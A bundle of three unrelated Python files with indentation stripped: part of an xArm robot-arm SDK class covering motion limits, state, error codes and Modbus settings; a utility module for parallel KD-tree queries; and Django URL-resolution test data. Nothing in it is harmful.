if 'F' in kwargs and isinstance(kwargs['F'], (int, float)):
self._last_tcp_speed = kwargs.get('F')
self._last_tcp_speed = min(max(self._last_tcp_speed, self._min_tcp_speed), self._max_tcp_speed)
if 'Q' in kwargs and isinstance(kwargs['Q'], (int, float)):
self._last_tcp_acc = kwargs.get('Q')
self._last_tcp_acc = min(max(self._last_tcp_acc, self._min_tcp_acc), self._max_tcp_acc)
if 'F2' in kwargs and isinstance(kwargs['F2'], (int, float)):
self._last_joint_speed = kwargs.get('F2')
if not is_radian:
self._last_joint_speed = math.radians(self._last_joint_speed)
self._last_joint_speed = min(max(self._last_joint_speed, self._min_joint_speed), self._max_joint_speed)
if 'Q2' in kwargs and isinstance(kwargs['Q2'], (int, float)):
self._last_joint_acc = kwargs.get('Q2')
if not is_radian:
self._last_joint_acc = math.radians(self._last_joint_acc)
self._last_joint_acc = min(max(self._last_joint_acc, self._min_joint_acc), self._max_joint_acc)
if 'T' in kwargs and isinstance(kwargs['T'], (int, float)):
self._mvtime = kwargs.get('T')
if 'LIMIT_VELO' in kwargs and isinstance(kwargs['LIMIT_VELO'], (list, tuple)) \
and len(kwargs['LIMIT_VELO']) == 2 and isinstance(kwargs['LIMIT_VELO'][0], (int, float)) \
and isinstance(kwargs['LIMIT_VELO'][1], (int, float)) \
and kwargs['LIMIT_VELO'][0] <= kwargs['LIMIT_VELO'][1]:
self._min_tcp_speed, self._max_tcp_speed = kwargs.get('LIMIT_VELO')
if 'LIMIT_ACC' in kwargs and isinstance(kwargs['LIMIT_ACC'], (list, tuple)) \
and len(kwargs['LIMIT_ACC']) == 2 and isinstance(kwargs['LIMIT_ACC'][0], (int, float)) \
and isinstance(kwargs['LIMIT_ACC'][1], (int, float)) \
and kwargs['LIMIT_ACC'][0] <= kwargs['LIMIT_ACC'][1]:
self._min_tcp_acc, self._max_tcp_acc = kwargs.get('LIMIT_ACC')
def _get_params(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
if is_radian:
return {
'lastPosition': self._last_position,
'lastAngles': self._last_angles,
'mvvelo': self._last_tcp_speed,
'mvacc': self._last_tcp_acc,
'tcpJerk': self._tcp_jerk,
'jointJerk': self._joint_jerk,
'angle_mvvelo': self._last_joint_speed,
'angle_mvacc': self._last_joint_acc,
'mvtime': self._mvtime,
'LIMIT_VELO': [self._min_tcp_speed, self._max_tcp_speed],
'LIMIT_ACC': [self._min_tcp_acc, self._max_tcp_acc],
'LIMIT_ANGLE_VELO': [self._min_joint_speed, self._max_joint_speed],
'LIMIT_ANGLE_ACC': [self._min_joint_acc, self._max_joint_acc],
}
else:
return {
'lastPosition': [math.degrees(self._last_position[i]) if 2 < i < 6 else self._last_position[i] for i in range(len(self._last_position))],
'lastAngles': [math.degrees(angle) for angle in self._last_angles],
'mvvelo': round(self._last_tcp_speed),
'mvacc': round(self._last_tcp_acc),
'tcpJerk': round(self._tcp_jerk),
'jointJerk': round(math.degrees(self._joint_jerk)),
'angle_mvvelo': round(math.degrees(self._last_joint_speed)),
'angle_mvacc': round(math.degrees(self._last_joint_acc)),
'mvtime': self._mvtime,
'LIMIT_VELO': list(map(round, [self._min_tcp_speed, self._max_tcp_speed])),
'LIMIT_ACC': list(map(round, [self._min_tcp_acc, self._max_tcp_acc])),
'LIMIT_ANGLE_VELO': list(map(round, [math.degrees(self._min_joint_speed), math.degrees(self._max_joint_speed)])),
'LIMIT_ANGLE_ACC': list(map(round, [math.degrees(self._min_joint_acc), math.degrees(self._max_joint_acc)])),
}
def _check_code(self, code, is_move_cmd=False):
if is_move_cmd:
if code in [0, XCONF.UxbusState.WAR_CODE]:
if self.arm_cmd.state_is_ready:
return 0
else:
return XCONF.UxbusState.STATE_NOT_READY
else:
return code
# return 0 if code in [0, XCONF.UxbusState.WAR_CODE] and self.arm_cmd.state_is_ready else XCONF.UxbusState.STATE_NOT_READY if not self.arm_cmd.state_is_ready else code
else:
return 0 if code in [0, XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE, XCONF.UxbusState.STATE_NOT_READY] else code
def wait_until_cmdnum_lt_max(self):
if not self._check_cmdnum_limit or self._stream_type != 'socket' or not self._enable_report:
return
# if time.time() - self._last_report_time > 0.4:
# self.get_cmdnum()
if self._max_cmd_num / 2 < self.cmd_num < self._max_cmd_num:
self.get_cmdnum()
while self.cmd_num >= self._max_cmd_num:
if not self.connected:
return APIState.NOT_CONNECTED
elif self.has_error:
return APIState.HAS_ERROR
elif not self.state_is_ready:
return APIState.NOT_READY
elif self.is_stop:
return APIState.EMERGENCY_STOP
time.sleep(0.05)
@xarm_is_connected(_type='get')
def get_version(self):
ret = self.arm_cmd.get_version()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
version = ''.join(list(map(chr, ret[1:])))
self._version = version[:version.find('\0')]
return ret[0], self._version
@xarm_is_connected(_type='get')
def get_robot_sn(self):
ret = self.arm_cmd.get_robot_sn()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
robot_sn = ''.join(list(map(chr, ret[1:])))
self._robot_sn = robot_sn[:robot_sn.find('\0')]
return ret[0], self._robot_sn
@xarm_is_connected(_type='get')
def check_verification(self):
ret = self.arm_cmd.check_verification()
ret[0] = self._check_code(ret[0])
return ret[0], ret[1]
@xarm_is_connected(_type='get')
def get_position(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_tcp_pose()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
# self._position = [float('{:.6f}'.format(ret[i][0])) for i in range(1, 7)]
self._position = [float('{:.6f}'.format(ret[i])) for i in range(1, 7)]
return ret[0], [float(
'{:.6f}'.format(math.degrees(self._position[i]) if 2 < i < 6 and not is_radian else self._position[i])) for
i in range(len(self._position))]
@xarm_is_connected(_type='get')
def get_servo_angle(self, servo_id=None, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_joint_pos()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 7:
# self._angles = [float('{:.6f}'.format(ret[i][0])) for i in range(1, 8)]
self._angles = [float('{:.6f}'.format(ret[i])) for i in range(1, 8)]
if servo_id is None or servo_id == 8 or len(self._angles) < servo_id:
return ret[0], list(
map(lambda x: float('{:.6f}'.format(x if is_radian else math.degrees(x))), self._angles))
else:
return ret[0], float(
'{:.6f}'.format(self._angles[servo_id - 1] if is_radian else math.degrees(self._angles[servo_id - 1])))
@xarm_is_connected(_type='get')
def get_position_aa(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_position_aa()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
pose = [float('{:.6f}'.format(ret[i] if i <= 3 or is_radian else math.degrees(ret[i]))) for i in
range(1, 7)]
return ret[0], pose
return ret[0], ret[1:7]
@xarm_is_connected(_type='get')
def get_pose_offset(self, pose1, pose2, orient_type_in=0, orient_type_out=0, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
_pose1 = [pose1[i] if i <= 2 or is_radian else math.radians(pose1[i]) for i in range(6)]
_pose2 = [pose2[i] if i <= 2 or is_radian else math.radians(pose2[i]) for i in range(6)]
ret = self.arm_cmd.get_pose_offset(_pose1, _pose2, orient_type_in, orient_type_out)
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
pose = [float('{:.6f}'.format(ret[i] if i <= 3 or is_radian else math.degrees(ret[i]))) for i in
range(1, 7)]
return ret[0], pose
return ret[0], ret[1:7]
def get_is_moving(self):
self.get_state()
return self._state == 1
@xarm_is_connected(_type='get')
def get_state(self):
ret = self.arm_cmd.get_state()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._state = ret[1]
self._last_update_state_time = time.time()
return ret[0], ret[1] if ret[0] == 0 else self._state
@xarm_is_connected(_type='set')
def set_state(self, state=0):
_state = self._state
ret = self.arm_cmd.set_state(state)
ret[0] = self._check_code(ret[0])
if state == 4 and ret[0] == 0:
# self._last_position[:6] = self.position
# self._last_angles = self.angles
self._sleep_finish_time = 0
# self._is_sync = False
self.get_state()
if _state != self._state:
self._report_state_changed_callback()
if _state == 3 and self._state != 3:
with self._cond_pause:
self._cond_pause.notifyAll()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[set_state], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[set_state], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> set_state({}) -> code={}, state={}'.format(state, ret[0], self._state), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_mode(self, mode=0):
ret = self.arm_cmd.set_mode(mode)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_mode({}) -> code={}'.format(mode, ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='get')
def get_cmdnum(self):
ret = self.arm_cmd.get_cmdnum()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
if ret[1] != self._cmd_num:
self._report_cmdnum_changed_callback()
self._cmd_num = ret[1]
self._last_update_cmdnum_time = time.time()
return ret[0], self._cmd_num
@xarm_is_connected(_type='get')
def get_err_warn_code(self, show=False, lang='en'):
ret = self.arm_cmd.get_err_code()
lang = lang if lang == 'cn' else 'en'
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._error_code, self._warn_code = ret[1:3]
self._last_update_err_time = time.time()
if show:
pretty_print('************* {}, {}: {} **************'.format(
'获取控制器错误警告码' if lang == 'cn' else 'GetErrorWarnCode',
'状态' if lang == 'cn' else 'Status',
ret[0]), color='light_blue')
controller_error = ControllerError(self._error_code, status=0)
controller_warn = ControllerWarn(self._warn_code, status=0)
pretty_print('* {}: {}, {}: {}'.format(
'错误码' if lang == 'cn' else 'ErrorCode',
controller_error.code,
'信息' if lang == 'cn' else 'Info',
controller_error.title[lang]),
color='red' if self._error_code != 0 else 'white')
pretty_print('* {}: {}, {}: {}'.format(
'警告码' if lang == 'cn' else 'WarnCode',
controller_warn.code,
'信息' if lang == 'cn' else 'Info',
controller_warn.title[lang]),
color='yellow' if self._warn_code != 0 else 'white')
pretty_print('*' * 50, color='light_blue')
return ret[0], ret[1:3] if ret[0] == 0 else [self._error_code, self._warn_code]
@xarm_is_connected(_type='set')
def clean_error(self):
ret = self.arm_cmd.clean_err()
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[clean_error], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[clean_error], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> clean_error -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def clean_warn(self):
ret = self.arm_cmd.clean_war()
self.log_api_info('API -> clean_warn -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
@xarm_is_not_simulation_mode(ret=0)
def motion_enable(self, enable=True, servo_id=None):
assert servo_id is None or (isinstance(servo_id, int) and 1 <= servo_id <= 8)
if servo_id is None or servo_id == 8:
ret = self.arm_cmd.motion_en(8, int(enable))
else:
ret = self.arm_cmd.motion_en(servo_id, int(enable))
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._is_ready = bool(enable)
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[motion_enable], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[motion_enable], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> motion_enable -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
def wait_move(self, timeout=None):
if timeout is not None:
expired = time.time() + timeout + (self._sleep_finish_time if self._sleep_finish_time > time.time() else 0)
else:
expired = 0
count = 0
_, state = self.get_state()
max_cnt = 2 if _ == 0 and state == 1 else 10
while timeout is None or time.time() < expired:
if not self.connected:
self.log_api_info('wait_move, xarm is disconnect', code=APIState.NOT_CONNECTED)
return APIState.NOT_CONNECTED
if time.time() - self._last_report_time > 0.4:
self.get_state()
self.get_err_warn_code()
if self.error_code != 0:
self.log_api_info('wait_move, xarm has error, error={}'.format(self.error_code), code=APIState.HAS_ERROR)
return APIState.HAS_ERROR
if self.is_stop:
_, state = self.get_state()
if _ != 0 or state not in [4, 5]:
time.sleep(0.02)
continue
self._sleep_finish_time = 0
self.log_api_info('wait_move, xarm is stop, state={}'.format(self.state), code=APIState.EMERGENCY_STOP)
return APIState.EMERGENCY_STOP
if time.time() < self._sleep_finish_time or self.state == 3:
time.sleep(0.02)
count = 0
continue
if self.state != 1:
count += 1
if count >= max_cnt:
_, state = self.get_state()
self.get_err_warn_code()
if _ == 0 and state != 1:
return 0
else:
count = 0
# return 0
# if count % 4 == 0:
# self.get_state()
# self.get_err_warn_code()
else:
count = 0
time.sleep(0.05)
return APIState.WAIT_FINISH_TIMEOUT
@xarm_is_connected(_type='set')
def _check_modbus_code(self, ret, length=2, only_check_code=False):
code = ret[0]
if self._check_code(code) == 0:
if not only_check_code:
if len(ret) < length:
return APIState.MODBUS_ERR_LENG
if ret[1] != XCONF.TGPIO_ID:
return APIState.TGPIO_ID_ERR
if code != 0:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
code = 0
return code
@xarm_is_connected(_type='set')
def checkset_modbus_baud(self, baudrate, check=True):
if check and self.modbus_baud == baudrate:
return 0
if baudrate not in self.arm_cmd.BAUDRATES:
return APIState.MODBUS_BAUD_NOT_SUPPORT
ret, cur_baud_inx = self._get_modbus_baudrate_inx()
if ret == 0:
baud_inx = self.arm_cmd.BAUDRATES.index(baudrate)
if cur_baud_inx != baud_inx:
try:
self._ignore_error = True
self._ignore_state = True if self.state not in [4, 5] else False
state = self.state
self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.MODBUS_BAUDRATE, baud_inx)
self.arm_cmd.tgpio_addr_w16(0x1A0B, baud_inx)
self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.SOFT_REBOOT, 1)
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code == 19 or self.error_code == 28:
self.clean_error()
if self._ignore_state:
self.set_state(state if state >= 3 else 0)
time.sleep(1)
except Exception as e:
self._ignore_error = False
self._ignore_state = False
logger.error('checkset_modbus_baud error: {}'.format(e))
return APIState.API_EXCEPTION
self._ignore_error = False
self._ignore_state = False
ret, cur_baud_inx = self._get_modbus_baudrate_inx()
self.log_api_info('API -> checkset_modbus_baud -> code={}, baud_inx={}'.format(ret, cur_baud_inx), code=ret)
if ret == 0 and baud_inx < len(self.arm_cmd.BAUDRATES):
self.modbus_baud = self.arm_cmd.BAUDRATES[cur_baud_inx]
return 0 if self.modbus_baud == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
@xarm_is_connected(_type='get')
def _get_modbus_baudrate_inx(self):
ret = self.arm_cmd.tgpio_addr_r16(XCONF.ServoConf.MODBUS_BAUDRATE & 0x0FFF)
if ret[0] in [XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE]:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
ret[0] = 0
return ret[0], ret[1]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_timeout(self, timeout):
ret = self.arm_cmd.set_modbus_timeout(timeout)
self.log_api_info('API -> set_tgpio_modbus_timeout -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_baudrate(self, baud):
code = self.checkset_modbus_baud(baud, check=False)
self.log_api_info('API -> set_tgpio_modbus_baudrate -> code={}'.format(code), code=code)
return code
@xarm_is_connected(_type='get')
def get_tgpio_modbus_baudrate(self):
code, baud_inx = self._get_modbus_baudrate_inx()
if code == 0 and baud_inx < len(self.arm_cmd.BAUDRATES):
self.modbus_baud = self.arm_cmd.BAUDRATES[baud_inx]
return code, self.modbus_baud
def getset_tgpio_modbus_data(self, datas, min_res_len=0, ignore_log=False):
if not self.connected:
return APIState.NOT_CONNECTED, []
ret = self.arm_cmd.tgpio_set_modbus(datas, len(datas))
ret[0] = self._check_modbus_code(ret, min_res_len + 2)
if not ignore_log:
self.log_api_info('API -> getset_tgpio_modbus_data -> code={}, response={}'.format(ret[0], ret[2:]), code=ret[0])
return ret[0], ret[2:]
@xarm_is_connected(_type='set')
def set_simulation_robot(self, on_off):
ret = self.arm_cmd.set_simulation_robot(on_off)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_simulation_robot({}) -> code={}'.format(on_off, ret[0]), code=ret[0])
return ret[0]
|
utils.py
|
from joblib import Parallel, delayed
from scipy import spatial
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import multiprocessing as mp
import copy
import time
tree = None
pred_vectors = None
def ordered_distance(i):
return tree.query(pred_vectors[i],k=1000)[1]
def load(a_tree, a_pred_vectors):
global tree, pred_vectors
tree = a_tree
pred_vectors = a_pred_vectors
def paral_query(my_tree, my_pred_vectors):
# load(tree,pred_vectors)
tree = my_tree
pred_vectors = my_pred_vectors
n = len(pred_vectors)
res = Parallel(n_jobs=-1, verbose=4, backend="multiprocessing", batch_size = 2)(
map(delayed(ordered_distance), np.array(range(n))))
res = np.array(res)
return res
def print_histo(rank, titulo='graph',bins = 1000):
plt.title(titulo)
plt.hist(rank,bins)
plt.show()
def get_table(data, indexs, columns_labels):
return pd.DataFrame(data=data, index=indexs, columns=columns_labels)
def worker(kdtree, query_list, ini, end, queue, job_number):
arr = [kdtree.query(vec, k=1000)[1] for vec in query_list[ini:end]]
queue.put((job_number, arr))
def parallel_query(kdtree, vectors, n_jobs=-1):
if n_jobs == -1:
n_jobs = mp.cpu_count()
ini_time = time.time()
print("-> launching %d jobs: " % n_jobs, end="")
m = mp.Manager()
r_queue = m.Queue()
N = len(vectors)
segments_size = len(vectors) // n_jobs
jobs = []
ini = 0
for i in range(n_jobs-1):
end = ini + segments_size + 1
jobs.append(mp.Process(target=worker, args=(kdtree, vectors, ini, end, r_queue, i)))
print(".", end="")
jobs[-1].start()
ini = end
jobs.append(mp.Process(target=worker, args=(kdtree, vectors, ini, N, r_queue, n_jobs-1)))
print(". DONE!", end="")
jobs[-1].start()
print(" || waiting %d jobs: " % n_jobs, end="")
for p in jobs:
p.join()
print(".", end="")
print(" DONE!", end="")
print(" || grouping data ---", end="")
result = {}
while not r_queue.empty():
par = r_queue.get()
result[par[0]] = par[1]
dists = []
for i in range(n_jobs):
dists.extend(result[i])
dists = np.array(dists)
end_time = time.time()
print(" DONE! [elapse time: {}]".format(round(end_time-ini_time, 3)))
return dists
|
tests.py
|
"""
Unit tests for reverse URL lookups.
"""
import pickle
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect
from django.shortcuts import redirect
from django.test import RequestFactory, SimpleTestCase, TestCase, override_settings
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch,
Resolver404,
ResolverMatch,
URLPattern,
URLResolver,
get_callable,
get_resolver,
get_urlconf,
include,
path,
re_path,
resolve,
reverse,
reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format:
# (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
(
"/normal/42/37/",
"normal-view",
"",
"",
"normal-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/view_class/42/37/",
"view-class",
"",
"",
"view-class",
views.view_class_instance,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/normal/42/37/",
"inc-normal-view",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-normal-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/view_class/42/37/",
"inc-view-class",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-view-class",
views.view_class_instance,
(),
{"arg1": "42", "arg2": "37"},
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
(
"/mixed_args/42/37/",
"mixed-args",
"",
"",
"mixed-args",
views.empty_view,
(),
{"extra": True, "arg2": "37"},
),
(
"/included/mixed_args/42/37/",
"inc-mixed-args",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-mixed-args",
views.empty_view,
(),
{"arg2": "37"},
),
(
"/included/12/mixed_args/42/37/",
"inc-mixed-args",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-mixed-args",
views.empty_view,
(),
{"arg2": "37"},
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
"/unnamed/normal/42/37/",
None,
"",
"",
"urlpatterns_reverse.views.empty_view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/unnamed/view_class/42/37/",
None,
"",
"",
"urlpatterns_reverse.views.ViewClass",
views.view_class_instance,
(),
{"arg1": "42", "arg2": "37"},
),
# If you have no kwargs, you get an args list.
(
"/no_kwargs/42/37/",
"no-kwargs",
"",
"",
"no-kwargs",
views.empty_view,
("42", "37"),
{},
),
(
"/included/no_kwargs/42/37/",
"inc-no-kwargs",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-no-kwargs",
views.empty_view,
("42", "37"),
{},
),
(
"/included/12/no_kwargs/42/37/",
"inc-no-kwargs",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-no-kwargs",
views.empty_view,
("12", "42", "37"),
{},
),
# Namespaces
(
"/test1/inner/42/37/",
"urlobject-view",
"testapp",
"test-ns1",
"test-ns1:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"included_namespace_urls:test-ns3",
"included_namespace_urls:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/ns-included1/normal/42/37/",
"inc-normal-view",
"included_namespace_urls",
"inc-ns1",
"inc-ns1:inc-normal-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"included_namespace_urls:test-ns3",
"included_namespace_urls:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/default/inner/42/37/",
"urlobject-view",
"testapp",
"testapp",
"testapp:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/other2/inner/42/37/",
"urlobject-view",
"nodefault",
"other-ns2",
"other-ns2:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/other1/inner/42/37/",
"urlobject-view",
"nodefault",
"other-ns1",
"other-ns1:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
# Nested namespaces
(
"/ns-included1/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"inc-ns1:test-ns3",
"inc-ns1:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/ns-included1/ns-included4/ns-included2/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:namespace_urls:included_namespace_urls:testapp",
"inc-ns1:inc-ns4:inc-ns2:test-ns3",
"inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/app-included/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"inc-app:test-ns3",
"inc-app:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/app-included/ns-included4/ns-included2/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:namespace_urls:included_namespace_urls:testapp",
"inc-app:inc-ns4:inc-ns2:test-ns3",
"inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
# Namespaces capturing variables
(
"/inc70/",
"inner-nothing",
"included_urls",
"inc-ns5",
"inc-ns5:inner-nothing",
views.empty_view,
(),
{"outer": "70"},
),
(
"/inc78/extra/foobar/",
"inner-extra",
"included_urls",
"inc-ns5",
"inc-ns5:inner-extra",
views.empty_view,
(),
{"outer": "78", "extra": "foobar"},
),
)
test_data = (
("places", "/places/3/", [3], {}),
("places", "/places/3/", ["3"], {}),
("places", NoReverseMatch, ["a"], {}),
("places", NoReverseMatch, [], {}),
("places?", "/place/", [], {}),
("places+", "/places/", [], {}),
("places*", "/place/", [], {}),
("places2?", "/", [], {}),
("places2+", "/places/", [], {}),
("places2*", "/", [], {}),
("places3", "/places/4/", [4], {}),
("places3", "/places/harlem/", ["harlem"], {}),
("places3", NoReverseMatch, ["harlem64"], {}),
("places4", "/places/3/", [], {"id": 3}),
("people", NoReverseMatch, [], {}),
("people", "/people/adrian/", ["adrian"], {}),
("people", "/people/adrian/", [], {"name": "adrian"}),
("people", NoReverseMatch, ["name with spaces"], {}),
("people", NoReverseMatch, [], {"name": "name with spaces"}),
("people2", "/people/name/", [], {}),
("people2a", "/people/name/fred/", ["fred"], {}),
("people_backref", "/people/nate-nate/", ["nate"], {}),
("people_backref", "/people/nate-nate/", [], {"name": "nate"}),
("optional", "/optional/fred/", [], {"name": "fred"}),
("optional", "/optional/fred/", ["fred"], {}),
("named_optional", "/optional/1/", [1], {}),
("named_optional", "/optional/1/", [], {"arg1": 1}),
("named_optional", "/optional/1/2/", [1, 2], {}),
("named_optional", "/optional/1/2/", [], {"arg1": 1, "arg2": 2}),
("named_optional_terminated", "/optional/1/", [1], {}),
("named_optional_terminated", "/optional/1/", [], {"arg1": 1}),
("named_optional_terminated", "/optional/1/2/", [1, 2], {}),
("named_optional_terminated", "/optional/1/2/", [], {"arg1": 1, "arg2": 2}),
("hardcoded", "/hardcoded/", [], {}),
("hardcoded2", "/hardcoded/doc.pdf", [], {}),
("people3", "/people/il/adrian/", [], {"state": "il", "name": "adrian"}),
("people3", NoReverseMatch, [], {"state": "il"}),
("people3", NoReverseMatch, [], {"name": "adrian"}),
("people4", NoReverseMatch, [], {"state": "il", "name": "adrian"}),
("people6", "/people/il/test/adrian/", ["il/test", "adrian"], {}),
("people6", "/people//adrian/", ["adrian"], {}),
("range", "/character_set/a/", [], {}),
("range2", "/character_set/x/", [], {}),
("price", "/price/$10/", ["10"], {}),
("price2", "/price/$10/", ["10"], {}),
("price3", "/price/$10/", ["10"], {}),
(
"product",
"/product/chocolate+($2.00)/",
[],
{"price": "2.00", "product": "chocolate"},
),
("headlines", "/headlines/2007.5.21/", [], {"year": 2007, "month": 5, "day": 21}),
(
"windows",
r"/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/",
[],
{"drive_name": "C", "path": r"Documents and Settings\spam"},
),
("special", r"/special_chars/~@+%5C$*%7C/", [r"~@+\$*|"], {}),
("special", r"/special_chars/some%20resource/", [r"some resource"], {}),
("special", r"/special_chars/10%25%20complete/", [r"10% complete"], {}),
("special", r"/special_chars/some%20resource/", [], {"chars": r"some resource"}),
("special", r"/special_chars/10%25%20complete/", [], {"chars": r"10% complete"}),
("special", NoReverseMatch, [""], {}),
("mixed", "/john/0/", [], {"name": "john"}),
("repeats", "/repeats/a/", [], {}),
("repeats2", "/repeats/aa/", [], {}),
("repeats3", "/repeats/aa/", [], {}),
("test", "/test/1", [], {}),
("inner-nothing", "/outer/42/", [], {"outer": "42"}),
("inner-nothing", "/outer/42/", ["42"], {}),
("inner-nothing", NoReverseMatch, ["foo"], {}),
("inner-extra", "/outer/42/extra/inner/", [], {"extra": "inner", "outer": "42"}),
("inner-extra", "/outer/42/extra/inner/", ["42", "inner"], {}),
("inner-extra", NoReverseMatch, ["fred", "inner"], {}),
("inner-no-kwargs", "/outer-no-kwargs/42/inner-no-kwargs/1/", ["42", "1"], {}),
("disjunction", NoReverseMatch, ["foo"], {}),
("inner-disjunction", NoReverseMatch, ["10", "11"], {}),
("extra-places", "/e-places/10/", ["10"], {}),
("extra-people", "/e-people/fred/", ["fred"], {}),
("extra-people", "/e-people/fred/", [], {"name": "fred"}),
("part", "/part/one/", [], {"value": "one"}),
("part", "/prefix/xx/part/one/", [], {"value": "one", "prefix": "xx"}),
("part2", "/part2/one/", [], {"value": "one"}),
("part2", "/part2/", [], {}),
("part2", "/prefix/xx/part2/one/", [], {"value": "one", "prefix": "xx"}),
("part2", "/prefix/xx/part2/", [], {"prefix": "xx"}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
("nested-noncapture", "/nested/noncapture/opt", [], {"p": "opt"}),
("nested-capture", "/nested/capture/opt/", ["opt/"], {}),
("nested-capture", NoReverseMatch, [], {"p": "opt"}),
("nested-mixedcapture", "/nested/capture/mixed/opt", ["opt"], {}),
("nested-mixedcapture", NoReverseMatch, [], {"p": "opt"}),
("nested-namedcapture", "/nested/capture/named/opt/", [], {"outer": "opt/"}),
("nested-namedcapture", NoReverseMatch, [], {"outer": "opt/", "inner": "opt"}),
("nested-namedcapture", NoReverseMatch, [], {"inner": "opt"}),
("non_path_include", "/includes/non_path_include/", [], {}),
# Tests for #13154
("defaults", "/defaults_view1/3/", [], {"arg1": 3, "arg2": 1}),
("defaults", "/defaults_view2/3/", [], {"arg1": 3, "arg2": 2}),
("defaults", NoReverseMatch, [], {"arg1": 3, "arg2": 3}),
("defaults", NoReverseMatch, [], {"arg2": 1}),
# Security tests
("security", "/%2Fexample.com/security/", ["/example.com"], {}),
)
